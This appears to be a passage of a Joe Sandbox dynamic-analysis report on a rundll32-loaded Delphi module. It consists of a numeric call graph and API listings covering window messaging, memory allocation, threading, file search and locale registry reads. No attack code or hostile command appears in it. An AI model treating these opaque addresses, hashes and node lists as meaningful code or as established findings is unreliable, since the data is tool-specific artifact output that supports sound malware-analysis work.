11895->11835 12062 41e5788 SystemParametersInfoW 11896->12062 11899 41e6299 11898->11899 11900 41e6320 11898->11900 11899->11900 11901 41e62a2 EnumWindows 11899->11901 11900->11837 11901->11900 11902 41e62c2 GetWindow GetWindowLongW 11901->11902 11945 41e61c0 11901->11945 11903 41e62df 11902->11903 11903->11900 11906 409f720 11903->11906 11907 409f72d 11906->11907 11908 409f73c SetWindowPos 11906->11908 11910 409f634 11907->11910 11908->11900 11908->11903 11915 4000240 11910->11915 11912 409f672 11920 401bd60 11912->11920 11914 409f681 11914->11914 11916 4000248 11915->11916 11919 4000295 11916->11919 11924 3ffd6a0 11916->11924 11918 4000284 LoadStringW 11918->11919 11919->11912 11921 401bd6c 11920->11921 11933 4017288 11921->11933 11923 401bd99 11923->11914 11925 3ffd6ae 11924->11925 11926 3ffd6cd 11924->11926 11925->11926 11929 3ffd658 11925->11929 11926->11918 11930 3ffd668 GetModuleFileNameW 11929->11930 11931 3ffd684 11929->11931 11932 3ffe8cc 44 API calls 11930->11932 11931->11918 11932->11931 11936 40172b0 11933->11936 11939 40172e0 11936->11939 11938 40172a8 11938->11923 11940 40172e9 11939->11940 11941 4017198 71 API calls 11940->11941 11943 4017349 11940->11943 11941->11943 11942 40173b0 11942->11938 11943->11942 11944 4017198 71 API calls 11943->11944 11944->11943 11946 41e61da 11945->11946 11947 41e620a GetWindow 11946->11947 11949 41e6222 11946->11949 11948 41e6216 GetWindowLongW 11947->11948 11947->11949 11948->11949 11951 41e650a 11950->11951 11952 41e64f1 11950->11952 11954 41e650f GetCurrentProcessId 11951->11954 11952->11951 11953 41e64fe GetWindowThreadProcessId 11952->11953 11953->11954 11955 41e6519 11954->11955 11956 41e6568 IsWindowVisible 11955->11956 11959 41e65a8 11955->11959 11957 41e6572 11956->11957 11956->11959 11960 3ffd280 11957->11960 11963 3ffcfd8 11960->11963 11962 3ffd28a 11962->11959 11964 3ffd016 11963->11964 11967 3ffcffb 11963->11967 11965 3ffd084 11964->11965 11968 3ffd151 11964->11968 11973 3ffd0eb 11965->11973 11974 3ffcf94 11965->11974 11967->11962 11968->11973 11991 3ffcab8 11968->11991 11969 3ffcfd8 25 API calls 11969->11973 11971 3ffd09c 11971->11973 11984 3ffc990 11971->11984 11973->11967 11973->11969 11995 400144c 11974->11995 11976 3ffcf9d 11977 3ffcfa5 11976->11977 11979 3ffcfb3 11976->11979 11978 400144c 4 API calls 11977->11978 11980 3ffcfaa 11978->11980 11981 400144c 4 API calls 11979->11981 11980->11971 11982 3ffcfc1 11981->11982 11983 400144c 4 API calls 11982->11983 11983->11980 11985 3ffc9ac 11984->11985 11986 3ffc9f0 11984->11986 11985->11986 11987 3ffca59 11985->11987 11988 3ffca2a 11985->11988 11986->11973 11987->11986 12010 3ffc6b4 11987->12010 11988->11986 11989 3ffc990 25 API calls 11988->11989 11989->11988 11992 3ffcac9 11991->11992 11993 3ffcac1 11991->11993 11992->11973 12035 3ffc878 11993->12035 11996 4001481 TlsGetValue 11995->11996 11997 400145b 11995->11997 11998 4001466 11996->11998 11999 400148b 11996->11999 11997->11976 12003 4001380 11998->12003 11999->11976 12001 400146b TlsGetValue 12002 400147a 12001->12002 12002->11976 12005 4001386 12003->12005 12004 40013aa 12004->12001 12005->12004 12009 400136c LocalAlloc 12005->12009 12007 40013a6 12007->12004 12008 40013b6 TlsSetValue 12007->12008 12008->12004 12009->12007 12011 3ffc853 12010->12011 12014 3ffc6d7 12010->12014 12011->11987 12012 3ffc990 25 API calls 12012->12014 12013 3ffc6b4 25 API calls 12013->12014 12014->12011 12014->12012 12014->12013 12017 3fffd4c 12014->12017 12023 3fffd20 12014->12023 12018 3fffd5e 12017->12018 12019 3fffd20 14 API calls 12018->12019 12020 3fffd73 12019->12020 12027 3fffcb4 12020->12027 12022 3fffd8a 12022->12014 12024 3fffd2b 12023->12024 12025 3fffd45 12023->12025 12031 3fffcec 12024->12031 12025->12014 12028 3fffcbf 12027->12028 12029 3fffce7 12027->12029 12030 3fff8f4 25 API calls 12028->12030 12029->12022 12030->12029 12032 3fffcfd 12031->12032 12033 3fffcf0 12031->12033 12032->12025 12034 3fff9cc 14 API calls 12033->12034 12034->12032 12036 3ffc88d 12035->12036 12037 3ffc8aa 12035->12037 12039 3ffc8de 12036->12039 12040 3ffc892 12036->12040 12037->11992 12039->12037 12045 3ffb168 12039->12045 12040->12037 12041 3ffc91d 12040->12041 12042 3ffc8a1 12040->12042 12041->12037 12044 3ffc878 25 API calls 12041->12044 12042->12037 12052 3ffc50c 12042->12052 12044->12041 12046 3ffb18f 12045->12046 12051 3ffacf4 12045->12051 12046->12039 12047 3ffad5c 12048 3ffad62 SysFreeString 12047->12048 12049 3ffad70 12047->12049 12048->12049 12049->12039 12050 3ffb17f SysReAllocStringLen 12050->12046 12050->12051 12051->12045 12051->12047 12051->12050 12053 3ffc69b 12052->12053 12056 3ffc531 12052->12056 12053->12042 12054 3fffd4c 25 API calls 12054->12056 12055 3ffb168 2 API calls 12055->12056 12056->12053 12056->12054 12056->12055 12057 3ffc878 25 API calls 12056->12057 12058 3ffc50c 25 API calls 12056->12058 12057->12056 12058->12056 12060 41e5777 12059->12060 12060->11893 12061 41e5788 SystemParametersInfoW 12060->12061 12061->11893 12062->11895 12064 41df43c 12063->12064 12065 41df7c6 12063->12065 12064->12065 12066 41df46a 12064->12066 12067 41df455 12064->12067 12065->11860 12069 41df496 12066->12069 12071 41df481 12066->12071 12085 41dec18 12067->12085 12070 41df462 12069->12070 12102 41e59b0 12069->12102 12074 41dec18 74 API calls 12070->12074 12072 41dec18 74 API calls 12071->12072 12072->12070 12075 41df4b1 12074->12075 12109 41e45b4 12075->12109 12077 41e45b4 GetSystemMetrics 12080 41df4c2 12077->12080 12078 41e40d4 GetMonitorInfoW 12078->12080 12079 41e4040 GetMonitorInfoW 12079->12080 12080->12065 12080->12077 12080->12078 12080->12079 12081 41e45a0 71 API calls 12080->12081 12082 41e408c GetMonitorInfoW 12080->12082 12083 41e4074 GetMonitorInfoW 12080->12083 12084 41e4058 GetMonitorInfoW 12080->12084 12081->12080 12082->12080 12083->12080 12084->12080 12112 4130d08 12085->12112 12087 41dec29 MonitorFromWindow 12088 41e45b4 GetSystemMetrics 12087->12088 12094 41dec3b 12088->12094 12089 41dec6a 12117 41e5940 12089->12117 12092 41dec74 12093 41e45b4 GetSystemMetrics 12092->12093 12099 41dec7e 12093->12099 12094->12089 12095 41dec56 12094->12095 12114 41e45a0 12094->12114 12097 41e45a0 71 API calls 12095->12097 12096 41dec62 12096->12070 12097->12096 12098 41e45a0 71 API calls 12098->12099 12099->12096 12099->12098 12100 41dec99 12099->12100 12101 41e45a0 71 API calls 12100->12101 12101->12096 12124 41e5960 12102->12124 12105 41e59d0 12105->12070 12106 41e5940 72 API calls 12107 41e59ca 12106->12107 12108 41e5960 73 API calls 12107->12108 12108->12105 12110 41e45be GetSystemMetrics 12109->12110 12111 41e45c6 12109->12111 12110->12080 12111->12080 12113 4130d12 12112->12113 12113->12087 12115 409f720 71 API calls 12114->12115 12116 41e45b0 12115->12116 12116->12094 12120 41e5908 12117->12120 12121 41e592e EnumDisplayMonitors 12120->12121 12123 41e5918 12120->12123 12121->12092 12122 409f720 71 API calls 12122->12123 12123->12121 12123->12122 12125 41e45b4 GetSystemMetrics 12124->12125 12128 41e5973 12125->12128 12126 41e45a0 71 API calls 12126->12128 12128->12126 12129 41e5993 12128->12129 12131 41e59a0 12128->12131 12132 41e4100 GetMonitorInfoW 12128->12132 12130 41e45a0 71 API calls 12129->12130 12130->12131 12131->12105 12131->12106 12132->12128 12134 41e7a92 12133->12134 12135 41e79b1 12133->12135 12134->11864 12154 41e8764 12134->12154 12136 41e79b7 IsWindowUnicode 12135->12136 12137 41e79c1 12135->12137 12136->12137 12138 41e79e8 PeekMessageA 12137->12138 12139 41e79d2 PeekMessageW 12137->12139 12140 41e79fc 12138->12140 12139->12140 12140->12134 12174 41e982c GetCapture 12140->12174 12142 41e7a37 12142->12134 12181 41e7824 12142->12181 12151 41e7a75 TranslateMessage 12152 41e7a8a DispatchMessageA 12151->12152 12153 41e7a82 DispatchMessageW 12151->12153 12152->12134 12153->12134 12260 41e86d8 GetCursorPos 12154->12260 12157 41e8e0c 125 API calls 12158 41e87ad 12157->12158 12263 41e89c0 12158->12263 12160 41e87cf 12162 41e8815 12160->12162 12166 41e881f 12160->12166 12170 41e881d GetCurrentThreadId 12160->12170 12268 41e8674 12162->12268 12163 41e8898 12274 40b396c 12163->12274 12164 41e889f 12168 41e88ad WaitMessage 12164->12168 12169 41e88b2 12164->12169 12166->12170 12171 41e883b SetTimer 12166->12171 12168->12169 12169->11864 12170->12163 12170->12164 12171->12170 12172 41e8862 12171->12172 12173 41e8674 73 API calls 12172->12173 12173->12170 12175 41e9841 12174->12175 12177 41e9852 12174->12177 12175->12177 12209 4123e70 12175->12209 12177->12142 12178 41e985d 12178->12177 12179 41e9863 GetParent 12178->12179 12180 4123e70 7 API calls 12178->12180 12179->12177 12179->12178 12180->12178 12182 41e784f 12181->12182 12183 41e7838 12181->12183 12182->12134 12185 41e76dc 12182->12185 12183->12182 12222 41e8e0c 12183->12222 12186 41e76ec 12185->12186 12187 41e7726 12185->12187 12186->12187 12188 41e7713 TranslateMDISysAccel 12186->12188 12187->12134 12189 41e772c 12187->12189 12188->12187 12190 41e781a 12189->12190 12191 41e7747 12189->12191 12190->12134 12204 41e7694 12190->12204 12191->12190 12192 41e7752 GetCapture 12191->12192 12193 41e77dc GetWindowThreadProcessId GetWindowThreadProcessId 12192->12193 12196 41e775d 12192->12196 12193->12190 12194 41e77fd SendMessageW 12193->12194 12194->12190 12203 41e77b9 12194->12203 12197 41e778e 12196->12197 12199 41e7777 GetParent 12196->12199 12200 41e776e 12196->12200 12257 4123ecc 12196->12257 12198 41e7794 IsWindowUnicode 12197->12198 12197->12200 12201 41e779e SendMessageW 12198->12201 12202 41e77bd SendMessageA 12198->12202 12199->12196 12200->12198 12201->12190 12201->12203 12202->12190 12202->12203 12203->12190 12205 41e76d9 12204->12205 12206 41e76a5 IsWindowUnicode 12204->12206 12205->12134 12205->12151 12207 41e76c6 IsDialogMessageA 12206->12207 12208 41e76b1 IsDialogMessageW 12206->12208 12207->12205 12208->12205 12210 4123e7b GetWindowThreadProcessId 12209->12210 12217 4123ec2 12209->12217 12211 4123e86 GetCurrentProcessId 12210->12211 12210->12217 12212 4123e90 12211->12212 12211->12217 12213 4123e9a GlobalFindAtomW 12212->12213 12214 4123ebb 12213->12214 12215 4123ea9 GetPropW 12213->12215 12218 4123e3c GetCurrentProcessId GetWindowThreadProcessId 12214->12218 12215->12217 12217->12178 12219 4123e53 12218->12219 12220 4123e69 12218->12220 12219->12220 12221 4123e58 SendMessageW 12219->12221 12220->12217 12221->12220 12223 41e8e39 12222->12223 12224 41e8e22 12222->12224 12223->12182 12230 41e8d98 12224->12230 12226 41e8e29 12239 41e56d4 12226->12239 12231 41e8df8 12230->12231 12232 41e8da6 12230->12232 12231->12226 12232->12231 12233 41e8dbc IsWindowVisible 12232->12233 12233->12231 12234 41e8dc6 12233->12234 12235 41e8dfa 12234->12235 12236 41e8dd8 12234->12236 12251 41e8ba4 12235->12251 12238 41e8de5 ShowWindow 12236->12238 12238->12231 12240 41e56eb 12239->12240 12241 41e56e0 UnhookWindowsHookEx 12239->12241 12242 41e570c SetEvent GetCurrentThreadId 12240->12242 12243 41e5752 12240->12243 12241->12240 12244 41e5749 CloseHandle 12242->12244 12245 41e5724 12242->12245 12248 41e8be4 12243->12248 12244->12243 12246 41e5730 MsgWaitForMultipleObjects 12245->12246 12247 41e7abc 123 API calls 12245->12247 12246->12244 12246->12245 12247->12246 12249 41e8c01 12248->12249 12250 41e8bf1 KillTimer 12248->12250 12249->12223 12250->12249 12252 41e8be4 KillTimer 12251->12252 12253 41e8bb4 SetTimer 12252->12253 12254 41e8bd9 12253->12254 12255 41e8be0 12253->12255 12256 41e8e0c 127 API calls 12254->12256 12255->12231 12256->12255 12258 4123e70 7 API calls 12257->12258 12259 4123ed6 12258->12259 12259->12196 12305 41259e4 12260->12305 12264 41e89d4 12263->12264 12266 41e89ea 12264->12266 12322 4155204 12264->12322 12266->12160 12267 41e8a08 12267->12160 12272 41e8681 12268->12272 12269 41e86d4 12269->12170 12271 41e86ab IsWindowVisible 12271->12272 12272->12269 12272->12271 12273 41e86bc IsWindowEnabled 12272->12273 12352 41e45e8 12272->12352 12273->12272 12275 40b3989 12274->12275 12276 40b3980 12274->12276 12355 40b4038 12275->12355 12276->12164 12279 40b39c7 12280 40b39cb 12279->12280 12281 40b39d4 12279->12281 12376 40b3944 WaitForSingleObject 12280->12376 12380 40b3938 ResetEvent 12281->12380 12282 40b4038 77 API calls 12285 40b39a0 12282->12285 12366 401bf28 12285->12366 12287 40b39c2 12372 3ffa390 12287->12372 12289 40b39d2 12381 3ff9ba4 12289->12381 12291 40b39ed 12385 3ff992c 12291->12385 12293 40b3b62 12293->12164 12295 409f720 71 API calls 12296 40b3a4f 12295->12296 12400 409f594 12296->12400 12298 40b3a5c 12404 3ff9b0c 12298->12404 12300 40b3a66 12301 3ff9ba4 5 API calls 12300->12301 12302 40b3b17 12301->12302 12303 3ff992c 13 API calls 12302->12303 12304 40b3b1f 12303->12304 12304->12164 12310 41259b0 WindowFromPoint 12305->12310 12307 41259f8 12309 4125a1e 12307->12309 12315 412d49c 12307->12315 12309->12157 12309->12158 12311 41259c4 12310->12311 12312 41259dd 12310->12312 12311->12312 12313 4123e70 7 API calls 12311->12313 12314 41259d1 GetParent 12311->12314 12312->12307 12313->12311 12314->12311 12314->12312 12316 412d4bb 12315->12316 12320 412d51b 12315->12320 12319 409f720 71 API calls 12316->12319 12316->12320 12321 412d49c 71 API calls 12316->12321 12317 412d552 12317->12309 12318 409f720 71 API calls 12318->12320 12319->12316 12320->12317 12320->12318 12321->12316 12323 415520a 12322->12323 12326 410cf04 12323->12326 12325 415521f 12325->12267 12327 410cf0a 12326->12327 12330 40d9948 12327->12330 12329 410cf1f 12329->12325 12331 40d994e 12330->12331 12334 40b66a8 12331->12334 12333 40d9963 12333->12329 12335 40b66ae 12334->12335 12338 40b4c84 12335->12338 12337 40b66c3 12337->12333 12340 40b4c8b 12338->12340 12339 40b4cb0 12339->12337 12340->12339 12342 40b50e8 12340->12342 12343 40b510a 12342->12343 12344 40b513e 12343->12344 12345 40b51a0 54 API calls 12343->12345 12346 40b4fe4 71 API calls 12344->12346 12345->12344 12347 40b5156 12346->12347 12348 40b61f8 MultiByteToWideChar MultiByteToWideChar CompareStringW WideCharToMultiByte 12347->12348 12349 40b515f 12348->12349 12350 40b61a8 71 API calls 12349->12350 12351 40b5170 12349->12351 12350->12351 12351->12339 12353 409f720 71 API calls 12352->12353 12354 41e45f8 12353->12354 12354->12272 12356 400144c 4 API calls 12355->12356 12357 40b403e 12356->12357 12365 40b4092 12357->12365 12410 40b2134 12357->12410 12359 400144c 4 API calls 12360 40b398e 12359->12360 12360->12279 12360->12282 12363 40b4053 12414 40c4f30 12363->12414 12364 400144c 4 API calls 12364->12365 12365->12359 12367 401bf36 12366->12367 12368 4000240 46 API calls 12367->12368 12369 401bf60 12368->12369 12370 4017288 71 API calls 12369->12370 12371 401bf6e 12370->12371 12371->12287 12373 3ffa394 12372->12373 12375 3ffa3dc 12373->12375 12484 3ff6fb0 12373->12484 12377 40b395c 12376->12377 12378 40b3957 12376->12378 12377->12289 12487 40b3938 ResetEvent 12378->12487 12380->12289 12382 3ff9bac 12381->12382 12384 3ff9bc2 12382->12384 12488 3ff97d0 12382->12488 12384->12291 12387 3ff993a 12385->12387 12388 3ff9963 GetTickCount 12387->12388 12389 3ff9a0c GetTickCount 12387->12389 12390 3ff997b GetTickCount 12387->12390 12391 3ff99d5 GetTickCount 12387->12391 12393 3ff9988 12387->12393 12394 3ff99aa GetCurrentThreadId 12387->12394 12498 3ff9db8 GetCurrentThreadId 12387->12498 12503 3ff95e8 12387->12503 12388->12387 12510 3ff9b24 12389->12510 12390->12387 12390->12393 12391->12387 12391->12393 12393->12293 12393->12295 12394->12393 12396 3ff9a36 GetTickCount 12397 3ff9a1c 12396->12397 12397->12389 12397->12396 12398 3ff9aa0 12397->12398 12398->12393 12399 3ff9aa6 GetCurrentThreadId 12398->12399 12399->12393 12401 409f59f 12400->12401 12402 409f634 71 API calls 12401->12402 12403 409f5b3 12401->12403 12402->12403 12403->12298 12405 3ff9b14 12404->12405 12406 3ff9ba4 5 API calls 12405->12406 12407 3ff9b1b 12406->12407 12514 3ff9ac4 12407->12514 12411 40b213a 12410->12411 12428 40b3ca0 12411->12428 12413 40b2159 12413->12363 12452 40c507c 12414->12452 12416 40c4f57 12417 40c4f94 12416->12417 12421 40c4faa 12416->12421 12458 402ff04 12417->12458 12420 40c4fa8 12461 40c5120 12420->12461 12421->12420 12423 4000240 46 API calls 12421->12423 12424 40c4fda 12423->12424 12425 401bd60 71 API calls 12424->12425 12426 40c4fe9 12425->12426 12427 3ffa390 4 API calls 12426->12427 12427->12420 12429 40b3cb2 12428->12429 12430 40b3cfa 12429->12430 12431 40b3d50 GetCurrentThread GetCurrentThreadId 12429->12431 12441 3ffabd4 12430->12441 12433 40b3d4e 12431->12433 12433->12413 12434 40b3d0f 12434->12433 12435 40b3d18 GetLastError 12434->12435 12445 401a7e4 12435->12445 12437 40b3d27 12438 401bf28 71 API calls 12437->12438 12439 40b3d49 12438->12439 12440 3ffa390 4 API calls 12439->12440 12440->12433 12442 3ffabf1 12441->12442 12443 3ffac10 CreateThread 12442->12443 12444 3ffac39 12443->12444 12450 3ffab9c 12443->12450 12444->12434 12446 401a7f5 12445->12446 12447 401a7fb FormatMessageW 12445->12447 12446->12447 12448 401a81d 12447->12448 12449 401a843 LocalFree 12448->12449 12449->12437 12451 3ffaba4 12450->12451 12453 40c508b 12452->12453 12454 3ff9ba4 5 API calls 12453->12454 12455 40c5093 12454->12455 12456 3ff992c 13 API calls 12455->12456 12457 40c509b 12456->12457 12457->12416 12464 4031198 12458->12464 12460 402ff1b 12460->12420 12462 3ff9b0c 7 API calls 12461->12462 12463 40b408d 12462->12463 12463->12364 12465 40311a8 12464->12465 12466 40311b1 12465->12466 12467 40311bb 12465->12467 12472 4031158 12466->12472 12468 40311c4 12467->12468 12478 401bd18 12467->12478 12468->12460 12473 403116c 12472->12473 12474 4031177 12473->12474 12476 401bd18 4 API calls 12473->12476 12481 4032420 12474->12481 12476->12473 12479 3ffa390 4 API calls 12478->12479 12480 401bd22 12479->12480 12480->12468 12482 3ffcfd8 25 API calls 12481->12482 12483 4031194 12482->12483 12483->12460 12485 400144c 4 API calls 12484->12485 12486 3ff6fb5 12485->12486 12486->12375 12487->12377 12489 3ff97d9 12488->12489 12490 3ff97de 12488->12490 12492 3ff96a4 GetModuleHandleW GetProcAddress 12489->12492 12490->12384 12493 3ff96cc GetLogicalProcessorInformation 12492->12493 12497 3ff9714 12492->12497 12494 3ff96db GetLastError 12493->12494 12493->12497 12495 3ff96e5 12494->12495 12494->12497 12496 3ff96ed GetLogicalProcessorInformation 12495->12496 12496->12497 12497->12490 12499 3ff9dcc 12498->12499 12500 3ff9dc5 12498->12500 12501 3ff9df3 12499->12501 12502 3ff9de0 GetCurrentThreadId 12499->12502 12500->12387 12501->12387 12502->12501 12504 3ff95f3 12503->12504 12505 3ff9641 12504->12505 12506 3ff9619 Sleep 12504->12506 12507 3ff9622 12504->12507 12505->12387 12506->12505 12508 3ff963a SwitchToThread 12507->12508 12509 3ff9631 Sleep 12507->12509 12508->12505 12509->12505 12511 3ff9b7d 12510->12511 12512 3ff9b36 12510->12512 12511->12397 12512->12511 12513 3ff9b64 Sleep 12512->12513 12513->12512 12519 3ff97b8 GetCurrentThreadId 12514->12519 12516 3ff9afb 12516->12300 12517 3ff9acf 12517->12516 12518 3ff9b24 Sleep 12517->12518 12518->12516 12520 3ff97c5 12519->12520 12520->12517 12521 4016358 12533 3ffb8b4 12521->12533 12523 401636b GetFileAttributesW 12524 40163ff GetLastError 12523->12524 12525 401637e 12523->12525 12529 4016386 12524->12529 12526 40163c8 12525->12526 12527 401639a CreateFileW 12525->12527 12525->12529 12526->12529 12530 40163d4 CreateFileW 12526->12530 12528 40163b7 CloseHandle 12527->12528 12527->12529 12528->12529 12531 40163f1 CloseHandle 12530->12531 12532 40163fb 12530->12532 12531->12529 12532->12529 12534 3ffb8ba 12533->12534 12534->12523 12535 4240898 12538 40019b8 12535->12538 12537 42408a8 12540 40019c3 12538->12540 12542 3ffa6f8 12540->12542 12543 3ffa70c GetCurrentThreadId 12542->12543 12544 3ffa707 12542->12544 12545 3ffa742 12543->12545 12544->12543 12546 3ffa7b5 12545->12546 12547 3ffaa44 12545->12547 12561 3ffa68c 12546->12561 12549 3ffaa71 12547->12549 12550 3ffaa60 12547->12550 12552 3ffaa7a GetCurrentThreadId 12549->12552 12555 3ffaa87 12549->12555 12565 3ffa9ac 12550->12565 12552->12555 12554 3ffaa6a 12554->12549 12556 3ff6f7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 12555->12556 12557 3ffab17 FreeLibrary 12555->12557 12558 3ffab3f 12555->12558 12556->12555 12557->12555 12559 3ffab4e ExitProcess 12558->12559 12560 3ffab48 12558->12560 12560->12559 12562 3ffa6d4 12561->12562 12563 3ffa69c 12561->12563 12562->12537 12563->12562 12571 40002f4 GetSystemInfo 12563->12571 12567 3ffa9b6 GetStdHandle WriteFile 12565->12567 12569 3ffaa13 12565->12569 12572 3ffb5b8 12567->12572 12569->12554 12570 3ffaa03 GetStdHandle WriteFile 12570->12554 12571->12563 12573 3ffb5be 12572->12573 12573->12570 12574 41e7990 PeekMessageW 12575 41e7a92 12574->12575 12576 41e79b1 12574->12576 12577 41e79b7 IsWindowUnicode 12576->12577 12578 41e79c1 12576->12578 12577->12578 12579 41e79e8 PeekMessageA 12578->12579 12580 41e79d2 PeekMessageW 12578->12580 12581 41e79fc 12579->12581 12580->12581 12581->12575 12582 41e982c 9 API calls 12581->12582 12583 41e7a37 12582->12583 12583->12575 12584 41e7824 121 API calls 12583->12584 12585 41e7a44 12584->12585 12585->12575 12586 41e76dc TranslateMDISysAccel 12585->12586 12587 41e7a57 12586->12587 12587->12575 12588 41e772c 15 API calls 12587->12588 12589 41e7a64 12588->12589 12589->12575 12590 41e7694 3 API calls 12589->12590 12591 41e7a71 12590->12591 12591->12575 12592 41e7a75 TranslateMessage 12591->12592 12593 41e7a8a DispatchMessageA 12592->12593 12594 41e7a82 DispatchMessageW 12592->12594 12593->12575 12594->12575 12595 3ff59b0 12596 3ff59c8 12595->12596 12597 3ff5c10 12595->12597 12607 3ff59da 12596->12607 12610 3ff5a65 Sleep 12596->12610 12598 3ff5bd4 12597->12598 12599 3ff5d28 12597->12599 12605 3ff5bee Sleep 12598->12605 12611 3ff5c2e 12598->12611 12600 3ff575c VirtualAlloc 12599->12600 12601 3ff5d31 12599->12601 12603 3ff5797 12600->12603 12604 3ff5787 12600->12604 12602 3ff59e9 12619 3ff5710 12604->12619 12609 3ff5c04 Sleep 12605->12609 12605->12611 12607->12602 12608 3ff5ac8 12607->12608 12614 3ff5aa9 Sleep 12607->12614 12618 3ff5ad4 12608->12618 12624 3ff5694 12608->12624 12609->12598 12610->12607 12613 3ff5a7b Sleep 12610->12613 12612 3ff5c4c 12611->12612 12615 3ff5694 VirtualAlloc 12611->12615 12613->12596 12614->12608 12617 3ff5abf Sleep 12614->12617 12615->12612 12617->12607 12620 3ff5719 12619->12620 12621 3ff5758 12619->12621 12620->12621 12622 3ff5724 Sleep 12620->12622 12621->12603 12622->12621 12623 3ff573e Sleep 12622->12623 12623->12620 12628 3ff5628 12624->12628 12626 3ff569d VirtualAlloc 12627 3ff56b4 12626->12627 12627->12618 12629 3ff55c8 12628->12629 12629->12626

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,03FFE79C,?,?), ref: 03FFE70E
                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,03FFE79C,?,?), ref: 03FFE717
                                • Part of subcall function 03FFE5A4: FindFirstFileW.KERNEL32(00000000,?,00000000,03FFE602,?,00000001), ref: 03FFE5D7
                                • Part of subcall function 03FFE5A4: FindClose.KERNEL32(00000000,00000000,?,00000000,03FFE602,?,00000001), ref: 03FFE5E7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                              • String ID:
                              • API String ID: 3216391948-0
                              • Opcode ID: efc415f880243330ead3226ea18a786e55e0c24ca9bf98858d125542d33b951f
                              • Instruction ID: d072b2b4fd67a717b1439e69e1c8b2035214806651c04b840e7b17cf5eaa072f
                              • Opcode Fuzzy Hash: efc415f880243330ead3226ea18a786e55e0c24ca9bf98858d125542d33b951f
                              • Instruction Fuzzy Hash: E6115478A003099FDF05EFA4DC91AAEB7B8EF44300F5044B59E14EB271D774AE048A61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000000,03FFE602,?,00000001), ref: 03FFE5D7
                              • FindClose.KERNEL32(00000000,00000000,?,00000000,03FFE602,?,00000001), ref: 03FFE5E7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 1bfc0c6e4544fcc956165c34a10600f3441aeee2686e6e142bf1a68e39ce8aa8
                              • Instruction ID: e512e559f55ae650b70054c51ed895069f6462097a2fad129dd555a06753b84c
                              • Opcode Fuzzy Hash: 1bfc0c6e4544fcc956165c34a10600f3441aeee2686e6e142bf1a68e39ce8aa8
                              • Instruction Fuzzy Hash: 50F0E274914708AFCB11FB74CD1285EB7ACEF452107A404B0EE18D3270E634AF009924
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,03FFE3ED,?,?), ref: 03FFE201
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,03FFE3ED,?,?), ref: 03FFE24A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,03FFE3ED,?,?), ref: 03FFE26C
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 03FFE28A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 03FFE2A8
